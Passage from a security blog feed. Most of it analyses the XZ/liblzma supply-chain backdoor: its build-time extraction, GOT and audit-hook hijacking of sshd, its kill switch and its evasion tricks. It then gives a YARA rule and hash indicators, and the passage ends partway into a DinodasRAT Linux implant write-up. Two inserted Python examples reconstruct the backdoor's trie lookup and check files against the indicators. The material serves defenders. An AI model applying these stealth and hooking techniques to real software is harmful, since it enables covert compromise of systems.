  1046. <p>The last stage shell script performs many checks to ensure that it is running in the expected environment, such as whether the project is configured to use <a href="" target="_blank" rel="noopener">IFUNC</a> (which will be discussed in the next sections).</p>
  1047. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112359" src="" alt="" width="1024" height="83" srcset=" 1024w, 300w, 768w, 740w, 800w, 1110w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  1048. <p>Many of the other checks performed by this stage include determining whether GCC is used for compilation or if the project contains specific files that will be used by the script later on.</p>
  1049. <p>In this stage, it extracts the backdoor binary code itself, an <a href="" target="_blank" rel="noopener">object file</a> that is currently hidden in the same <strong>good-large_compressed.lzma</strong> file, but at a different offset.</p>
  1050. <p>The following code handles this:</p>
  1051. <div id="attachment_112360" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112360" class="size-large wp-image-112360" src="" alt="Partial command used by the last script stage" width="1024" height="160" srcset=" 1024w, 300w, 768w, 740w, 800w, 1392w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112360" class="wp-caption-text">Partial command used by the last script stage</p></div>
  1052. <p>The extraction process operates through a sequence of commands, with the result of each command serving as the input for the next one. The formatted one-liner code is shown below:</p>
  1053. <div id="attachment_112361" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112361" class="size-large wp-image-112361" src="" alt="Formatted backdoor extraction one-liner" width="1024" height="742" srcset=" 1024w, 300w, 768w, 483w, 740w, 387w, 800w, 1397w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112361" class="wp-caption-text">Formatted backdoor extraction one-liner</p></div>
  1054. <p>Initially, the file <strong>good-large_compressed.lzma</strong> is extracted using the <strong>XZ</strong> tool itself. The subsequent steps involve calling a chain of <strong>head</strong> calls with the &#8220;<strong>eval $i&#8221;</strong> function (same as the stage 3 extraction).</p>
  1055. <p>Then a custom RC4-like algorithm is used to decrypt the binary data, which contains another compressed file. This compressed file is also extracted using the XZ utility. The script then removes some bytes from the beginning of the decompressed data using predefined values and saves the result to disk as <strong>liblzma_la-crc64-fast.o</strong>, which is the backdoor file used in the linking process.</p>
  1056. <p>Finally, the script modifies the function <strong>is_arch_extension_supported</strong> from the <strong>crc_x86_clmul.h</strong> file in <strong>liblzma</strong>, to replace the call to the <strong>__get_cpuid</strong> function with <strong>_get_cpuid</strong>, removing one underscore character.</p>
  1057. <p>This modification allows it to be linked into the library (we&#8217;ll discuss this in more detail in the next section). The whole build infection chain can be summarized in the following scheme:</p>
  1058. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112362" src="" alt="" width="1024" height="531" srcset=" 1024w, 300w, 768w, 1536w, 675w, 740w, 540w, 800w, 1645w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  1059. <h2 id="binary-backdoor-analysis">Binary backdoor analysis</h2>
  1060. <h3 id="a-stealth-loading-scenario">A stealth loading scenario</h3>
1061. <p>In the original XZ code, there are two special functions used to calculate the CRC of the given data: <strong>lzma_crc32</strong> and <strong>lzma_crc64</strong>. Both of these functions are stored in the ELF symbol table with type <a href="" target="_blank" rel="noopener">IFUNC</a>, a feature provided by the GNU C Library (GLIBC). IFUNC allows developers to dynamically select the correct function to use. This selection takes place when the dynamic linker loads the shared library.</p>
1062. <p>The reason XZ uses this is that it allows for determining whether an optimized version of the <strong>lzma_crcX</strong> function should be used or not. The optimized version requires special features from modern processors (CLMUL, SSSE3, SSE4.1). These special features need to be verified by issuing the <strong>cpuid</strong> instruction, which is called using the <a href="" target="_blank" rel="noopener"><strong>__get_cpuid</strong></a> wrapper/intrinsic provided by GLIBC, and it is at this point that the backdoor takes advantage of the mechanism to load itself.</p>
1063. <p>The backdoor is stored as an object file, and its primary goal is to be linked to the main executable during compilation. The object file contains the <strong>_get_cpuid</strong> symbol, as the injected shell scripts remove one underscore character from the original source code, which means that when the code calls <strong>_get_cpuid</strong>, it actually calls the backdoor&#8217;s version of it.</p>
  1064. <div id="attachment_112363" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112363" class="size-large wp-image-112363" src="" alt="Backdoor code entry point" width="1024" height="392" srcset=" 1024w, 300w, 768w, 915w, 740w, 732w, 800w, 1302w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112363" class="wp-caption-text">Backdoor code entry point</p></div>
  1065. <h3 id="backdoor-code-analysis">Backdoor code analysis</h3>
1066. <p>The initial backdoor code is invoked twice, as both <strong>lzma_crc32</strong> and <strong>lzma_crc64</strong> use the same modified function (<strong>_get_cpuid</strong>). To ensure control over this, a simple counter is created to verify that the code has already been executed. The actual malicious activity starts when the <strong>lzma_crc64</strong> IFUNC invokes <strong>_get_cpuid</strong>, sees the counter value 1 indicating that the function has already been accessed, and initiates one final step to redirect to the true entry point of this malware.</p>
  1067. <div id="attachment_112364" style="width: 864px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112364" class="size-large wp-image-112364" src="" alt="Backdoor initialization" width="854" height="1024" srcset=" 854w, 250w, 768w, 168w, 292w, 740w, 233w, 751w, 964w" sizes="(max-width: 854px) 100vw, 854px" /></a><p id="caption-attachment-112364" class="wp-caption-text">Backdoor initialization</p></div>
  1068. <p>To initialize the malicious code, the backdoor first initializes a couple of structures that hold core information about the current running process. Primarily, it locates the Global Offset Table (<a href="">GOT</a>) address using hardcoded offsets, and uses this information to find the <strong>cpuid</strong> pointer inside it.</p>
  1069. <div id="attachment_112365" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112365" class="size-large wp-image-112365" src="" alt="GOT modification code" width="1024" height="381" srcset=" 1024w, 300w, 768w, 1536w, 940w, 740w, 752w, 800w, 1678w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112365" class="wp-caption-text">GOT modification code</p></div>
  1070. <p>The GOT contains the offsets of symbols, including the <strong>cpuid</strong> wrapper. The backdoor then swaps the pointers to the main malware function, and calls it as if it were calling <strong>cpuid</strong>.</p>
  1071. <h3 id="core-behavior">Core behavior</h3>
  1072. <p>The main goal of the backdoor is to successfully hook specific functions that will allow it to monitor every connection to the infected machine. The targeted functions include:</p>
  1073. <table width="100%">
  1074. <tbody>
  1075. <tr>
  1076. <td width="30%"><strong>Targeted function</strong></td>
  1077. <td width="70%"><strong>Description</strong></td>
  1078. </tr>
  1079. <tr>
  1080. <td><strong>RSA_public_decrypt</strong></td>
  1081. <td>Used by <strong>libcrypto</strong> to decrypt a ciphertext signed by a private key</td>
  1082. </tr>
  1083. <tr>
  1084. <td><strong>EVP_PKEY_set1_RSA</strong></td>
  1085. <td>Used by <strong>libcrypto</strong> to set the RSA key of a given context</td>
  1086. </tr>
  1087. <tr>
  1088. <td><strong>RSA_get0_key</strong></td>
  1089. <td>Used by <strong>libcrypto</strong> to retrieve an RSA key</td>
  1090. </tr>
  1091. </tbody>
  1092. </table>
  1093. <p>However, hooking all these functions is not a simple and straightforward task for the backdoor. It involves accessing many internal structures and manipulating process-specific structures until it achieves its goal, and it also needs to be as stealthy as possible, which means that the malicious code contains multiple checks to avoid being analyzed.</p>
  1094. <h3 id="execution-environment-check">Execution environment check</h3>
  1095. <p>It first parses <strong>ld-linux</strong> (dynamic linker), which is primarily responsible for dynamically resolving symbol addresses in memory. It also extracts various information about the environment and verifies that the current process the backdoor is running in matches its execution criteria, which are:</p>
  1096. <ul>
  1097. <li>The current process is <strong>/usr/bin/sshd</strong></li>
  1098. <li>Check if the kill switch is present</li>
  1099. </ul>
  1100. <p>It extracts the name of the current process from <strong>argv[0]</strong> and also parses all the process environment variables to see if any of them are present in its internal string table. If a match is found, or the process is not <strong>sshd</strong>, the malware halts its execution.</p>
  1101. <div id="attachment_112366" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112366" class="size-large wp-image-112366" src="" alt="Process environment check" width="1024" height="864" srcset=" 1024w, 300w, 768w, 415w, 740w, 332w, 800w, 1299w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112366" class="wp-caption-text">Process environment check</p></div>
  1102. <p>The only variable inside its own table is <strong>yolAbejyiejuvnup=Evjtgvsh5okmkAvj</strong>, which in this context serves as a <strong>kill switch</strong>.</p>
  1103. <h3 id="the-trie-structure">The trie structure</h3>
1104. <p>One of the distinctive features of the backdoor is the use of a single <a href="" target="_blank" rel="noopener">trie</a> structure for string operations. Instead of directly comparing strings or using string hashes to match a particular constant (for example, the name of a library function), the code performs a trie lookup, and checks if the result is equal to a certain constant number. For example, the magic value for the ELF header results in the trie returning <strong>0x300</strong>, and the name of the <strong>system</strong> function is matched with a return value of <strong>0x9F8</strong>. The trie is not just used for comparisons: certain functions that use pointers to strings (for example, <strong>ssh-2.0</strong>) search for these strings in the host binary using the trie, so there will be no suspicious data in the backdoor&#8217;s body.</p>
  1105. <p>The implementation of the trie uses 16-byte bitmasks, each half corresponding to the byte input ranges <strong>0x00-0x3F</strong> and <strong>0x40-0x7F</strong>, and 2-byte trie leaf nodes, 3 bits of which are flags (direction, termination) and the rest is reserved for the value (or the location of the next node).</p>
  1106. <div id="attachment_112367" style="width: 658px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112367" class="size-full wp-image-112367" src="" alt="Part of the trie lookup function that performs the bitmap match" width="648" height="275" srcset=" 648w, 300w" sizes="(max-width: 648px) 100vw, 648px" /></a><p id="caption-attachment-112367" class="wp-caption-text">Part of the trie lookup function that performs the bitmap match</p></div>
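<p>The lookup described above, as an added example that is not the backdoor&#8217;s code: a simplified Python reconstruction of a bitmap-compressed trie following the layout in the text (a 16-byte bitmask per node covering input bytes 0x00-0x7F, followed by 2-byte entries whose low 3 bits are flags and whose remaining 13 bits carry the value or the child node). The flag-bit assignment, the popcount-based entry indexing and the 0x7A0 value for &#8220;ssh-2.0&#8221; are assumptions; 0x300 and 0x9F8 are the values quoted above. The last field returned by demo() shows the point that matters to an analyst: the matched strings never appear in the serialized table, so string extraction on the binary does not reveal them.</p>

```python
"""Simplified bitmap-trie lookup (added example, not the backdoor's code)."""
import struct

FLAG_TERMINAL = 0x1    # assumed flag bit: the entry carries a match value
FLAG_DIRECTION = 0x2   # second flag named in the article; not needed for lookup
MASK_LEN = 16          # 128 bits, one per input byte 0x00-0x7F


def _entry_index(mask: bytes, b: int) -> int:
    """Entries follow the bitmask in bit order, so an entry's index is the
    number of set bits for input bytes smaller than b (a popcount)."""
    full = sum(bin(mask[j]).count("1") for j in range(b >> 3))
    partial = bin(mask[b >> 3] & ((1 << (b & 7)) - 1)).count("1")
    return full + partial


def build(table: dict) -> tuple:
    """Serialize {key_bytes: value} into (blob, node_offsets).

    Keys must use 7-bit bytes, and no key may be a prefix of another: in
    this simplified layout an entry is either terminal or points to a child.
    """
    nodes = [{}]  # node index -> {input byte: (terminal, payload)}
    for key, value in table.items():
        cur = 0
        for i, b in enumerate(key):
            if b > 0x7F:
                raise ValueError("only input bytes 0x00-0x7F are representable")
            children = nodes[cur]
            if i == len(key) - 1:
                if b in children:
                    raise ValueError("prefix collision")
                children[b] = (True, value)
            else:
                if b not in children:
                    nodes.append({})
                    children[b] = (False, len(nodes) - 1)
                elif children[b][0]:
                    raise ValueError("prefix collision")
                cur = children[b][1]
    blob, offsets = bytearray(), []
    for children in nodes:
        offsets.append(len(blob))
        mask = bytearray(MASK_LEN)
        for b in children:
            mask[b >> 3] |= 1 << (b & 7)
        blob += mask
        for b in sorted(children):  # entry order must match bit order
            terminal, payload = children[b]
            if payload >> 13:
                raise ValueError("payload must fit in 13 bits")
            blob += struct.pack("<H", (payload << 3) | (FLAG_TERMINAL if terminal else 0))
    return bytes(blob), offsets


def lookup(blob: bytes, offsets: list, key: bytes) -> int:
    """Walk the serialized trie; return the value for an exact match, else 0."""
    cur = 0
    for i, b in enumerate(key):
        off = offsets[cur]
        mask = blob[off:off + MASK_LEN]
        if b > 0x7F or not (mask[b >> 3] >> (b & 7)) & 1:
            return 0
        idx = _entry_index(mask, b)
        (entry,) = struct.unpack_from("<H", blob, off + MASK_LEN + 2 * idx)
        flags, payload = entry & 0x7, entry >> 3
        if flags & FLAG_TERMINAL:
            return payload if i == len(key) - 1 else 0
        cur = payload
    return 0  # input ended before reaching a terminal entry


# Constructed table: the two return values quoted in the article, plus one
# made-up value for the "ssh-2.0" marker mentioned there.
DEMO_TABLE = {b"\x7fELF": 0x300, b"system": 0x9F8, b"ssh-2.0": 0x7A0}


def demo() -> dict:
    blob, offsets = build(DEMO_TABLE)
    return {
        "system": lookup(blob, offsets, b"system"),
        "elf_magic": lookup(blob, offsets, b"\x7fELF"),
        "systemd": lookup(blob, offsets, b"systemd"),  # longer than the key -> 0
        "syste": lookup(blob, offsets, b"syste"),      # shorter than the key -> 0
        "plaintext_visible": b"system" in blob,        # the string itself is absent
    }


if __name__ == "__main__":
    print(demo())
```

<p>Because a lookup returns only a small constant, an analyst recovering the table has to replay the structure against candidate strings (as demo() does) rather than read them out of the binary; that is the whole purpose of the design.</p>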
  1107. <h3 id="symbol-resolver">Symbol resolver</h3>
  1108. <p>There are at least three symbol resolver-related routines used by the backdoor to locate the ELF Symbol structure, which holds information such as the symbol name and its offset. All symbol resolver functions receive a key to be searched in the trie.</p>
  1109. <div id="attachment_112368" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112368" class="size-large wp-image-112368" src="" alt="Symbol resolver example" width="1024" height="195" srcset=" 1024w, 300w, 768w, 740w, 800w, 1028w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112368" class="wp-caption-text">Symbol resolver example</p></div>
  1110. <p>One of the backdoor resolver functions iterates through all symbols and verifies which one has the desired key. If it is found, it returns the <strong>Elf64_Sym</strong> structure, which will later be used to populate an internal structure of the backdoor that holds all the necessary function pointers. This process is similar to that commonly seen in Windows threats with API hashing routines.</p>
  1111. <p>The backdoor searches many functions from the libcrypto (OpenSSL) library, as these will be used in later encryption routines. It also keeps track of how many functions it was able to find and resolve; this determines whether it is executing properly or should stop.</p>
  1112. <p>Another interesting symbol resolver abuses the <strong>lzma_alloc</strong> function, which is part of the liblzma library itself. This function serves as a helper for developers to allocate memory efficiently using the default allocator (malloc) or a custom one. In the case of the XZ backdoor, this function is abused to make use of a fake allocator. In reality, it functions as another symbol resolver. The parameter intended for &#8220;allocation size&#8221; is, in fact, the symbol key inside the trie. This trick is meant to complicate backdoor analysis.</p>
  1113. <div id="attachment_112369" style="width: 1007px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112369" class="size-full wp-image-112369" src="" alt="Symbol resolver using a fake allocator structure" width="997" height="98" srcset=" 997w, 300w, 768w, 990w, 740w, 800w" sizes="(max-width: 997px) 100vw, 997px" /></a><p id="caption-attachment-112369" class="wp-caption-text">Symbol resolver using a fake allocator structure</p></div>
  1114. <p>The backdoor dynamically resolves its symbols while executing; it doesn&#8217;t necessarily do so all at once or only when it needs to use them. The resolved symbols/functions range from legitimate OpenSSL functions to functions such as <strong>system</strong>, which is used to execute commands on the machine.</p>
  1115. <h3 id="the-symbind-hook">The Symbind hook</h3>
1116. <p>As mentioned earlier, the primary objective of the backdoor initialization is to successfully hook functions. To do so, the backdoor makes use of <a href="" target="_blank" rel="noopener"><strong>rtld-audit</strong></a>, a feature of the dynamic linker that enables the creation of custom shared libraries to be notified when certain events occur within the linker, such as symbol resolution. In a typical scenario, a developer would create a shared library following the <a href="" target="_blank" rel="noopener"><strong>rtld-audit</strong> manual</a>. However, the XZ backdoor opts to perform a runtime patch on the already registered (default) interfaces loaded in memory, thereby hijacking the symbol-resolving routine.</p>
  1117. <div id="attachment_112370" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112370" class="size-large wp-image-112370" src="" alt="dl-audit runtime patch" width="1024" height="194" srcset=" 1024w, 300w, 768w, 740w, 800w, 1385w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112370" class="wp-caption-text">dl-audit runtime patch</p></div>
  1118. <p>The maliciously crafted structure <a href="" target="_blank" rel="noopener"><strong>audit_iface</strong></a>, stored in the <strong>dl_audit</strong> global variable within the dynamic linker&#8217;s memory area, contains the <strong>symbind64</strong> callback address, which is invoked by the dynamic linker. It sends all the symbol information to the backdoor control, which is then used to obtain a malicious address for the target functions, thus achieving hooking.</p>
  1119. <div id="attachment_112371" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112371" class="size-large wp-image-112371" src="" alt="Hooking placement inside the Symbind modified callback" width="1024" height="308" srcset=" 1024w, 300w, 768w, 740w, 932w, 800w, 1085w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112371" class="wp-caption-text">Hooking placement inside the Symbind modified callback</p></div>
1120. <p>The addresses for <strong>dl_audit</strong> and <strong>dl_naudit</strong>, which holds the number of audit interfaces available, are obtained by disassembling both the <strong>dl_main</strong> and <strong>dl_audit_symbind_alt</strong> functions. The backdoor contains an internal minimalistic <strong>disassembler</strong> used for instruction decoding. It makes extensive use of it, especially when hunting for specific values like the <strong>*audit</strong> addresses.</p>
  1121. <div id="attachment_112372" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112372" class="size-large wp-image-112372" src="" alt="dl_naudit hunting code" width="1024" height="492" srcset=" 1024w, 300w, 768w, 728w, 740w, 582w, 800w, 1504w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112372" class="wp-caption-text">dl_naudit hunting code</p></div>
1122. <p>The <strong>dl_naudit</strong> address is found by one of the <strong>mov</strong> instructions within the <strong>dl_main</strong> function code that accesses it. With that information, the backdoor hunts for access to a memory address and saves it.</p>
1123. <p>It also verifies if the memory address acquired is the same address as the one accessed by the <strong>dl_audit_symbind_alt</strong> function on a given offset. This allows it to safely assume that it has indeed found the correct address. After it finds the <strong>dl_naudit</strong> address, it can easily calculate where <strong>dl_audit</strong> is, since the two are stored next to each other in memory.</p>
  1124. <h2 id="conclusion">Conclusion</h2>
  1125. <p>In this article, we covered the entire process of backdooring <strong>liblzma (XZ)</strong>, and delved into a detailed analysis of the binary backdoor code, up to achieving its principal goal: hooking.</p>
  1126. <p>It&#8217;s evident that this backdoor is highly complex and employs sophisticated methods to evade detection. These include the multi-stage implantation in the <strong>XZ</strong> repository, as well as the complex code contained within the binary itself.</p>
  1127. <p>There is still much more to explore about the backdoor&#8217;s internals, which is why we have decided to present this as <strong>Part I</strong> of the <strong>XZ</strong> backdoor series.</p>
  1128. <p>Kaspersky products detect malicious objects related to the attack as <strong>HEUR:Trojan.Script.XZ</strong> and <strong>Trojan.Shell.XZ</strong>. In addition, Kaspersky Endpoint Security for Linux detects malicious code in SSHD process memory as <strong>MEM:Trojan.Linux.XZ</strong> (as part of the Critical Areas Scan task).</p>
  1129. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  1130. <h3 id="yara-rules">Yara rules</h3>
1131. <pre class="crayon-plain-tag">rule liblzma_get_cpuid_function {
1132.     meta:
1133.         description = "Rule to find the malicious get_cpuid function CVE-2024-3094"
1134.         author = "Kaspersky Lab"
1135.     strings:
1136.         $a = { F3 0F 1E FA 55 48 89 F5 4C 89 CE 53 89 FB 81 E7 00 00 00 80 48 83 EC 28 48 89 54 24 18 48 89 4C 24 10 4C 89 44 24 08 E8 ?? ?? ?? ?? 85 C0 74 27 39 D8 72 23 4C 8B 44 24 08 48 8B 4C 24 10 45 31 C9 48 89 EE 48 8B 54 24 18 89 DF E8 ?? ?? ?? ?? B8 01 00 00 00 EB 02 31 C0 48 83 C4 28 5B 5D C3 }
1137.     condition:
1138.         $a
1139. }</pre>
  1140. <h3 id="known-backdoored-libraries">Known backdoored libraries</h3>
  1141. <p><strong>Debian Sid</strong><br />
  1142. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">4f0cf1d2a2d44b75079b3ea5ed28fe54</a><br />
  1143. 72e8163734d586b6360b24167a3aff2a3c961efb<br />
  1144. 319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae</p>
  1145. <p><strong>Debian Sid</strong><br />
  1146. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">53d82bb511b71a5d4794cf2d8a2072c1</a><br />
  1147. 8a75968834fc11ba774d7bbdc566d272ff45476c<br />
  1148. 605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4</p>
  1149. <p><strong>Related files</strong><br />
  1150. d302c6cb2fa1c03c710fa5285651530f,<br />
  1151. 4f0cf1d2a2d44b75079b3ea5ed28fe54,<br />
  1152. 153df9727a2729879a26c1995007ffbc,<br />
  1153. 53d82bb511b71a5d4794cf2d8a2072c1,<br />
  1154. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">212ffa0b24bb7d749532425a46764433</a>, liblzma_la-crc64-fast.o</p>
  1155. <p><strong>Analyzed artefacts</strong><br />
  1156. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">35028f4b5c6673d6f2e1a80f02944fb2</a>, bad-3-corrupt_lzma2.xz<br />
  1157. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">b4dd2661a7c69e85f19216a6dbbb1664</a>, build-to-host.m4<br />
  1158. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">540c665dfcd4e5cfba5b72b4787fec4f</a>, good-large_compressed.lzma</p>
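<p>An added example (not Kaspersky&#8217;s tooling) that turns the indicators above into an offline check: it matches the hex string from the YARA rule, wildcards included, against a byte buffer, and compares the MD5, SHA-1 and SHA-256 of a file against the hashes listed for the known backdoored libraries. The buffer returned by build_sample() is constructed for the test and is not a real library; on a real host, pass the bytes of the installed liblzma to check_library(), or call scan_path() on its path.</p>

```python
"""Offline IoC check for the liblzma backdoor (added example, not vendor code)."""
import hashlib
import re

# Hex string copied from the article's YARA rule; "??" is a one-byte wildcard.
GET_CPUID_PATTERN = (
    "F3 0F 1E FA 55 48 89 F5 4C 89 CE 53 89 FB 81 E7 00 00 00 80 "
    "48 83 EC 28 48 89 54 24 18 48 89 4C 24 10 4C 89 44 24 08 E8 ?? ?? ?? ?? "
    "85 C0 74 27 39 D8 72 23 4C 8B 44 24 08 48 8B 4C 24 10 45 31 C9 48 89 EE "
    "48 8B 54 24 18 89 DF E8 ?? ?? ?? ?? B8 01 00 00 00 EB 02 31 C0 48 83 C4 28 5B 5D C3"
)

# Hashes listed in the article under "Known backdoored libraries" (Debian Sid).
KNOWN_BAD_HASHES = {
    "md5": {"4f0cf1d2a2d44b75079b3ea5ed28fe54", "53d82bb511b71a5d4794cf2d8a2072c1"},
    "sha1": {"72e8163734d586b6360b24167a3aff2a3c961efb",
             "8a75968834fc11ba774d7bbdc566d272ff45476c"},
    "sha256": {"319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae",
               "605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4"},
}


def parse_hex_pattern(text: str) -> list:
    """'F3 ?? C3' -> [0xF3, None, 0xC3]; None matches any byte."""
    out = []
    for tok in text.split():
        if tok == "??":
            out.append(None)
        elif re.fullmatch(r"[0-9A-Fa-f]{2}", tok):
            out.append(int(tok, 16))
        else:
            raise ValueError(f"bad token {tok!r}")
    return out


def find_pattern(data: bytes, pattern: list) -> int:
    """Offset of the first match of pattern in data, or -1 if absent."""
    n = len(pattern)
    # Use the first fixed byte as a cheap anchor, then verify the whole pattern.
    first = next(i for i, p in enumerate(pattern) if p is not None)
    anchor = bytes([pattern[first]])
    start = data.find(anchor)
    while start != -1:
        base = start - first
        if 0 <= base and base + n <= len(data) and all(
            p is None or data[base + i] == p for i, p in enumerate(pattern)
        ):
            return base
        start = data.find(anchor, start + 1)
    return -1


def file_hashes(data: bytes) -> dict:
    return {name: hashlib.new(name, data).hexdigest() for name in ("md5", "sha1", "sha256")}


def check_library(data: bytes) -> dict:
    """Report hash hits against the listed IoCs and the signature offset (-1 = none)."""
    hashes = file_hashes(data)
    hits = [name for name, digest in hashes.items() if digest in KNOWN_BAD_HASHES[name]]
    return {
        "hashes": hashes,
        "known_bad_hash": hits,
        "pattern_offset": find_pattern(data, parse_hex_pattern(GET_CPUID_PATTERN)),
    }


def scan_path(path: str) -> dict:
    with open(path, "rb") as fh:
        return check_library(fh.read())


def build_sample() -> bytes:
    """Constructed test buffer: NOP filler with the signature bytes (wildcards
    filled with 0x41) placed at offset 100. Not a real library."""
    body = bytes(0x41 if p is None else p for p in parse_hex_pattern(GET_CPUID_PATTERN))
    return b"\x90" * 100 + body + b"\x90" * 64


if __name__ == "__main__":
    print(check_library(build_sample()))
```

<p>A hash match is exact but brittle (any rebuild changes it), while the byte signature survives rebuilds of the same object file; a practitioner would want both checks, which is why the function reports them separately.</p>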
  1159. ]]></content:encoded>
  1160. <wfw:commentRss></wfw:commentRss>
  1161. <slash:comments>2</slash:comments>
  1162. <media:content xmlns:media="" url="" width="2666" height="1500"><media:keywords>full</media:keywords></media:content>
  1163. <media:content xmlns:media="" url="" width="1024" height="576"><media:keywords>large</media:keywords></media:content>
  1164. <media:content xmlns:media="" url="" width="300" height="169"><media:keywords>medium</media:keywords></media:content>
  1165. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1166. </item>
  1167. <item>
  1168. <title>DinodasRAT Linux implant targeting entities worldwide</title>
  1169. <link></link>
  1170. <comments></comments>
  1171. <dc:creator><![CDATA[Anderson Leite, Lisandro Ubiedo]]></dc:creator>
  1172. <pubDate>Thu, 28 Mar 2024 13:00:51 +0000</pubDate>
  1173. <category><![CDATA[Malware descriptions]]></category>
  1174. <category><![CDATA[Backdoor]]></category>
  1175. <category><![CDATA[DinodasRAT]]></category>
  1176. <category><![CDATA[Linux]]></category>
  1177. <category><![CDATA[Malware]]></category>
  1178. <category><![CDATA[Malware Descriptions]]></category>
  1179. <category><![CDATA[Malware Technologies]]></category>
  1180. <category><![CDATA[RedHat]]></category>
  1181. <category><![CDATA[Trojan]]></category>
  1182. <category><![CDATA[Ubuntu]]></category>
  1183. <category><![CDATA[Unix and macOS malware]]></category>
  1184. <guid isPermaLink="false"></guid>
  1186. <description><![CDATA[In this article, we share our analysis of a recent version of the DinodasRAT implant for Linux, which may have been active since 2022.]]></description>
  1187. <content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>DinodasRAT, also known as <a href="" target="_blank" rel="noopener">XDealer</a>, is a multi-platform backdoor written in C++ that offers a range of capabilities. This RAT allows the malicious actor to surveil and harvest sensitive data from a target&#8217;s computer. A Windows version of this RAT was used in attacks against government entities in Guyana, and documented by ESET researchers as <a href="" target="_blank" rel="noopener">Operation Jacana</a>.</p>
  1188. <p>In early October 2023, after the ESET publication, we discovered a new Linux version of DinodasRAT. Sample artifacts suggest that this version (V10 according to the attackers&#8217; versioning system) may have started operating in 2022, although the first known Linux variant (V7), which has still not been publicly described, dates back to 2021. In this analysis, we&#8217;ll discuss technical details of one Linux implant used by the attackers.</p>
  1189. <h2 id="initial-infection-overview">Initial infection overview</h2>
  1190. <p>The DinodasRAT Linux implant primarily targets Red Hat-based distributions and Ubuntu Linux. When first executed, it creates a hidden file in the same directory as the executable, following the format &#8220;.[executable_name].mu&#8221;. This file is used as a sort of mutex in order to ensure the implant only runs one instance and only allows it to proceed if it is able to successfully create this file.</p>
  1191. <p>The backdoor maintains persistence and is launched as follows:</p>
  1192. <div id="attachment_112287" style="width: 823px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112287" class="size-full wp-image-112287" src="" alt="Backdoor main code" width="813" height="665" srcset=" 813w, 300w, 768w, 428w, 740w, 342w, 800w" sizes="(max-width: 813px) 100vw, 813px" /></a><p id="caption-attachment-112287" class="wp-caption-text">Backdoor main code</p></div>
  1193. <p>The backdoor establishes persistence and starts with the following steps:</p>
  1194. <ol>
  1195. <li>Direct execution without arguments;
  1196. <ul>
  1197. <li>It first executes without any arguments, which makes it run in the background by calling the &#8220;daemon&#8221; function from Linux.</li>
  1198. </ul>
  1199. </li>
  1200. <li>Establishing persistence on the infected system by utilizing SystemV or SystemD startup scripts (detailed in the next section).</li>
  1201. <li>Executing itself again with the parent process ID (PPID) as an argument;
  1202. <ul>
  1203. <li>The newly created process (child) continues the backdoor infection while the parent process waits.</li>
  1204. <li>This technique not only gives Dinodas the ability to verify that it has executed correctly, but also makes it harder to detect with debugging and monitoring tools.</li>
  1205. </ul>
  1206. </li>
  1207. </ol>
  1208. <h2 id="victim-id-generation-and-persistence">Victim ID generation and persistence</h2>
  1209. <p>Before establishing contact with the C2 server, the backdoor gathers information about the infected machine and infection time to create a unique identifier for the victim&#8217;s machine. Notably, the attackers do not collect any user-specific data to generate this UID. The UID typically includes:</p>
  1210. <ul>
  1211. <li>Date of infection;</li>
